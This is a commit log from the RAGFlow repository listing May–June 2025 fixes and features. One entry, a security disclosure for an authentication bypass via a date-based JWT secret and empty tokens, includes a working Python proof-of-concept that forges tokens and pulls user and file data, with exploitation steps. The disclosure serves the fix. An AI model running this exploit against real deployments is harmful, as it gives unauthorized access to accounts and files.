869 Commits

Author SHA1 Message Date
Jin Hai
4a2ff633e0
Fix typo in code (#8327)
### What problem does this PR solve?

Fix typo in code

### Type of change

- [x] Refactoring

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2025-06-18 09:41:09 +08:00
Liu An
0a13d79b94
Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318)
### What problem does this PR solve?

- Replace hardcoded 255-byte file name length checks with
FILE_NAME_LEN_LIMIT constant
- Update error messages to show the actual limit value
- #8290

### Type of change

- [x] Refactoring

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-17 18:01:30 +08:00
Liu An
64e281b398
Fix: Add validation for empty filenames in document_app.py (#8321)
### What problem does this PR solve?

- Add validation for empty filenames in document_app.py and trim
whitespace

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-17 15:53:41 +08:00
Liu An
a3bebeb599
Fix: Enforce 255-byte filename limit (#8290)
### What problem does this PR solve?

- Add filename length validation (<=255 bytes) for document
upload/rename in both HTTP and SDK APIs
- Update error messages for consistency
- Fix comparison operator in SDK from '>=' to '>' for filename length
check

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-16 16:39:41 +08:00
Yongteng Lei
0fa1a1469e
Fix: avoid mixing different embedding models in document parsing (#8260)
### What problem does this PR solve?

Fix mixing different embedding models in document parsing.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-06-16 13:40:12 +08:00
Kevin Hu
f7074037ef
Feat: Let number of task ahead be visible. (#8259)
### What problem does this PR solve?


![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1)

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-13 17:32:40 +08:00
Yongteng Lei
b2eed8fed1
Fix: incorrect progress updating (#8253)
### What problem does this PR solve?

Progress is only updated if it's valid and not regressive.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-13 17:24:14 +08:00
Liu An
99725444f1
Fix: desc parameter parsing (#8229)
### What problem does this PR solve?

- Fix boolean parsing for 'desc' parameter in kb_app.py to properly
handle string values

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 19:17:47 +08:00
Stephen Hu
1ab0f52832
Fix:The OpenAI-Compatible Agent API returns an incorrect message (#8177)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/8175

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 19:17:15 +08:00
Kevin Hu
d36c8d18b1
Refa: make exception more clear. (#8224)
### What problem does this PR solve?

#8156

### Type of change
- [x] Refactoring
2025-06-12 17:53:59 +08:00
Liu An
7fbbc9650d
Fix: Move pagerank field from create to update dataset API (#8217)
### What problem does this PR solve?

- Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq
- Add pagerank update logic in dataset update endpoint
- Update API documentation to reflect changes
- Modify related test cases and SDK references

#8208

This change makes pagerank a mutable property that can only be set after
dataset creation, and only when using elasticsearch as the doc engine.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 15:47:49 +08:00
Liu An
d0c5ff04a6
Fix: Add pagerank validation for non-elasticsearch doc engines (#8215)
### What problem does this PR solve?

Validate that pagerank updates are only allowed when using elasticsearch
as the document engine. Return an error if pagerank is set while using a
different doc engine, preventing potential inconsistencies in document
scoring.

#8208

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 15:47:22 +08:00
Liu An
cef587abc2
Fix: Add validation for dataset name in KB update API (#8194)
### What problem does this PR solve?

Validate dataset name in knowledge base update endpoint to ensure:
- Name is a non-empty string
- Name length doesn't exceed DATASET_NAME_LIMIT
- Whitespace is trimmed before processing

Prevents invalid dataset names from being saved and provides clear error
messages.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 11:37:25 +08:00
Liu An
60c1bf5a19
Fix: duplicate knowledgebase name validation logic (#8199)
### What problem does this PR solve?

Change the condition from checking for >1 to >=1 when validating
duplicate knowledgebase names to properly catch all duplicates. This
ensures no two knowledgebases can have the same name for a tenant.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-12 09:46:57 +08:00
Liu An
e87ad8126c
Fix: Improve dataset name validation in KB app (#8188)
### What problem does this PR solve?

- Trim whitespace before checking for empty dataset names
- Change length check from >= to > DATASET_NAME_LIMIT for consistency

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-11 16:14:29 +08:00
Stephen Hu
e6f68e1ccf
Fix: When List Kbs some times the total is wrong (#8151)
### What problem does this PR solve?
for kb.app list method when owner_ids the total calculate is wrong (now
will base on the paged result to calculate total)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 11:34:30 +08:00
yurhett
9c6c6c51e0
Fix: use jwks_uri from OIDC metadata for JWKS client (#8136)
### What problem does this PR solve?
Issue: #8051

The current implementation assumes JWKS endpoints follow the standard
`/.well-known/jwks.json` convention. This breaks authentication for OIDC
providers that use non-standard JWKS paths, resulting in 404 errors
during token validation.

Root Cause Analysis
- The OpenID Connect specification doesn't mandate a fixed path for JWKS
endpoints
- Some identity providers (like certain Keycloak configurations) use
custom endpoints
- Our previous approach constructed JWKS URLs by convention rather than
discovery

### Solution Approach
Instead of constructing JWKS URLs by appending to the issuer URI, we
now:
1. Properly leverage the `jwks_uri` from the OIDC discovery metadata
2. Honor the identity provider's actual configured endpoint

```python
# Before (fragile approach)
jwks_url = f"{self.issuer}/.well-known/jwks.json"

# After (standards-compliant)
jwks_cli = jwt.PyJWKClient(self.jwks_uri)  # Use discovered endpoint
```

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-10 10:16:58 +08:00
Liu An
968ffc7ef3
Refa: dataset operations to simplify error handling (#8132)
### What problem does this PR solve?

- Consolidate database operations within single try-except blocks in the
methods

### Type of change

- [x] Refactoring
2025-06-09 13:29:56 +08:00
Liu An
92625e1ca9
Fix: document typo in test (#8091)
### What problem does this PR solve?

fix document typo in test

### Type of change

- [x] Typo
2025-06-05 19:03:46 +08:00
Stephen Hu
6953ae89c4
Fix:when stream=false,new message without sessionid does no (#8078)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8070

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 15:14:15 +08:00
Kevin Hu
91804f28f1
Fix: issue for tavily only in a assistant. (#8076)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 13:00:43 +08:00
Liu An
8b7c424617
Fix: Document.update() now refreshes object data (#8068)
### What problem does this PR solve?

#8067 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:46:29 +08:00
Gecko Security
de89b84661
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)
### Description

There's a critical authentication bypass vulnerability that allows
remote attackers to gain unauthorized access to user accounts without
any credentials. The vulnerability stems from two security flaws: (1)
the application uses a predictable `SECRET_KEY` that defaults to the
current date, and (2) the authentication mechanism fails to properly
validate empty access tokens left by logged-out users. When combined,
these flaws allow attackers to forge valid JWT tokens and authenticate
as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY`
that, in default configurations, is set to `str(date.today())` (e.g.,
"2025-05-30"). When users log out, their `access_token` field in the
database is set to an empty string but their account records remain
active. An attacker can exploit this by generating a JWT token that
represents an empty access_token using the predictable daily secret,
effectively bypassing all authentication controls.


### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing
attacker-controlled JWT token

**Flow Path:**
1. **Entry Point:** `load_user()` function in `api/apps/__init__.py`
(Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from
`api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty
access_token
5. **Sink:** Authentication succeeds, returning first user with empty
access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    
    auth_headers = {"Authorization": malicious_token}
    
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f"  Email: {user_data.get('email')}")
                    print(f"  User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f"  Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty
access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any
credentials


**Version:** 0.19.0
@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
2025-06-05 12:10:24 +08:00
Stephen Hu
f819378fb0
Update api_utils.py (#8069)
### What problem does this PR solve?


https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486
lazy throw exception to better support custom embedding model

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 12:05:58 +08:00
Liu An
ab5e3ded68
Fix: DataSet.update() now refreshes object data (#8058)
### What problem does this PR solve?

#8057 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-05 09:26:19 +08:00
天海蒼灆
9938a4cbb6
Feat: Allow update conversation parameters and persist to database in completion (#8039)
### What problem does this PR solve?

This PR updates the completion function to allow parameter updates when
a session_id exists. It also ensures changes are saved back to the
database via API4ConversationService.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-06-04 14:39:04 +08:00
Stephen Hu
b832372c98
Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037)
### What problem does this PR solve?

Close #8033

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-04 10:18:14 +08:00
Kevin Hu
b6f1cd7809
Fix: no kb selected for an assistant. (#8021)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-03 17:42:16 +08:00
Liu An
e64da8b2aa
Fix: sdk can not update chat model (#8016)
### What problem does this PR solve?

#7791

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-06-03 15:22:26 +08:00
Jin Hai
31f4d44c73
Update upload filename length limit from 128 to 256, which is aligned with os (#7971)
### What problem does this PR solve?

Change filename length limit from 128 to 256

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2025-05-30 14:25:59 +08:00
CharlesHsu
241fdf266a
Fix: Prevent Flask hot reload from hanging due to early thread startup (#7966)
**Fix: Prevent Flask hot reload from hanging due to early thread
startup**

### What problem does this PR solve?

When running the Flask server with `use_reloader=True` (enabled during
debug mode), modifying a Python source file would trigger a reload
detection (`Detected change in ...`), but the application would hang
instead of restarting cleanly.

This was caused by the `update_progress` background thread being started
**too early**, often within the main module scope.
This issue was reported in
[#7498](https://github.com/infiniflow/ragflow/issues/7498).

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
---

**Summary of changes:**
- Wrapped `update_progress` launch in a `threading.Timer` with delay to
avoid premature thread execution.
- Marked thread as `daemon=True` to avoid blocking process exit.
- Added `WERKZEUG_RUN_MAIN` environment check to ensure background
threads only run in the reloader child process (the actual Flask app).
- Retained original behavior in production mode (`debug=False`).

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-05-30 13:38:30 +08:00
Stephen Hu
62611809e0
Fix: Add user_id when create Conversation (#7960)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7940

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 13:11:41 +08:00
dong
62de535ac8
Fix Bug: When performing the dify_retrieval, the metadata of the document was empty. (#7968)
### What problem does this PR solve?
When performing the dify_retrieval, the metadata of the document was
empty.


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 12:58:05 +08:00
Qidi Cao
f0879563d0
fix: resolve residual image files issue after document deletion (#7964)
### What problem does this PR solve?

When deleting knowledge base documents in RAGFlow, the current process
only removes the block texts in Elasticsearch and the original files in
MinIO, but it leaves behind many binary images and thumbnails generated
during chunking. This pull request improves the deletion process by
querying the block information in Elasticsearch to ensure a more
thorough and complete cleanup.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 12:56:33 +08:00
Stephen Hu
a31ad7f960
Fix: File selection in Retrieval testing causes other options to disappear (#7759)
### What problem does this PR solve?

https://github.com/infiniflow/ragflow/issues/7753

The internal is due to when the selected row keys change will trigger a
testing, but I do not know why.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-30 09:38:50 +08:00
天海蒼灆
f584f5c3d0
agents openai API add new way to get session_id (#7937)
### What problem does this PR solve?

SpringAI can only add session_id in metadata。so add new way to get
session_id from "id" or "metadata.id"

![image](https://github.com/user-attachments/assets/0c698ebb-2228-46d8-94c5-2a291b6f70bf)

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-29 13:31:17 +08:00
Yongteng Lei
0c562f0a9f
Refa: change citation mark as [ID:n] (#7923)
### What problem does this PR solve?

Change citation mark as [ID:n], it's easier for LLMs to follow the
instruction :) #7904

### Type of change

- [x] Refactoring
2025-05-29 10:03:51 +08:00
Yongteng Lei
b95747be4c
Fix: early return when update doc in sdk (#7907)
### What problem does this PR solve?

Fix early return when update doc. #7886

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-28 19:20:27 +08:00
sinopec
243ed4bc35
Feat: Surpport dynamically add knowledge basees for retrieval while u… (#7915)
…sing the SDK chat API

### What problem does this PR solve?

When using the SDK for chat, you can include the IDs of additional
knowledge bases you want to use in the request. This way, you don’t need
to repeatedly create new assistants to support various combinations of
knowledge bases. This is especially useful when there are many knowledge
bases with different content. If users clearly know which knowledge base
contains the information they need and select accordingly, the recall
accuracy will be greatly improved.

Users only need to add an extra field, a kb_ids array, in the HTTP
request. The content of this field can be determined by the client
fetching the list of knowledge bases and letting the user select from
it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: Li Ye <liye@unittec.com>
2025-05-28 19:16:16 +08:00
Qidi Cao
4d835b7303
fix: resolve “has no attribute 'max_length'” error in keyword_extraction (#7903)
### What problem does this PR solve?

**Issue Description:**

When using the `/api/retrieval` endpoint with a POST request and setting
the `keyword` parameter to `true`, the system invokes the
`model_instance` method from `TenantLLMService` to create a `chat_mdl`
instance. Subsequently, it calls the `keyword_extraction` method to
extract keywords.

However, within the `keyword_extraction` method, the `chat` function of
the LLM attempts to access the `chat_mdl.max_length` attribute to
validate input length. This results in the following error:

```
AttributeError: 'SILICONFLOWChat' object has no attribute 'max_length'
```

**Proposed Solution:**

Upon reviewing other parts of the codebase where `chat_mdl` instances
are created, it appears that utilizing `LLMBundle` for instantiation is
more appropriate. `LLMBundle` includes the `max_length` attribute, which
should resolve the encountered error.



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2025-05-28 10:58:06 +08:00
liu an
ff0e82988f
Fix: patch regex vulnerability in filename handling (#7887)
### What problem does this PR solve?

[Regular Expression Injection leading to Denial of Service
(ReDoS)](https://github.com/infiniflow/ragflow/security/advisories/GHSA-wqq6-x8g9-f7mh)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-27 16:35:37 +08:00
Kevin Hu
1f32e6e4f4
Fix: list out of boundary (#7843)
### What problem does this PR solve?

Close #7837
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-26 10:28:36 +08:00
Hao Zhang
2f4d803db1
Delete Corresponding Minio Bucket When Deleting a Knowledge Base (#7841)
### What problem does this PR solve?

Delete Corresponding Minio Bucket When Deleting a Knowledge Base
[issue #4113 ](https://github.com/infiniflow/ragflow/issues/4113)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2025-05-26 10:02:51 +08:00
Yongteng Lei
453287b06b Feat: more robust fallbacks for citations (#7801)
### What problem does this PR solve?

Add more robust fallbacks for citations

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2025-05-23 18:24:55 +08:00
liu an
e166f132b3 Feat: change default models (#7777)
### What problem does this PR solve?

change default models to buildin models
https://github.com/infiniflow/ragflow/issues/7774

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-23 18:21:25 +08:00
Yongteng Lei
42f4d4dbc8 Fix: wrong type hint (#7738)
### What problem does this PR solve?

Wrong hint type. #7729.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2025-05-23 18:21:06 +08:00
liu an
fed1221302
Refa: HTTP API list datasets / test cases / docs (#7720)
### What problem does this PR solve?

This PR introduces Pydantic-based validation for the list datasets HTTP
API, improving code clarity and robustness. Key changes include:

Pydantic Validation
Error Handling
Test Updates
Documentation Updates

### Type of change

- [x] Documentation Update
- [x] Refactoring
2025-05-20 09:58:26 +08:00
Chaoxi Weng
6ed81d6774
Feat: Add OAuth state parameter for CSRF protection (#7709)
### What problem does this PR solve?

Add OAuth `state` parameter for CSRF protection:
- Updated `get_authorization_url()` to accept an optional state
parameter
- Generated a unique state value during OAuth login and stored in
session
- Verified state parameter in callback to ensure request legitimacy

This PR follows OAuth 2.0 security best practices by ensuring that the
authorization request originates from the same user who initiated the
flow.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2025-05-20 09:40:31 +08:00
donblack01
115850945e
Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325)
### What problem does this PR solve?

Fix:When you create a new API module named xxxa_api, the access route
will become xxx instead of xxxa. For example, when I create a new API
module named 'data_api', the access route will become 'dat' instead of
'data'
Fix:Fixed the issue where the new knowledge base would not be renamed
when there was a knowledge base with the same name

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2025-05-20 09:39:26 +08:00
Yongteng Lei
e8e2a95165
Refa: more fallbacks for bad citation format (#7710)
### What problem does this PR solve?

More fallbacks for bad citation format

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
2025-05-19 19:34:05 +08:00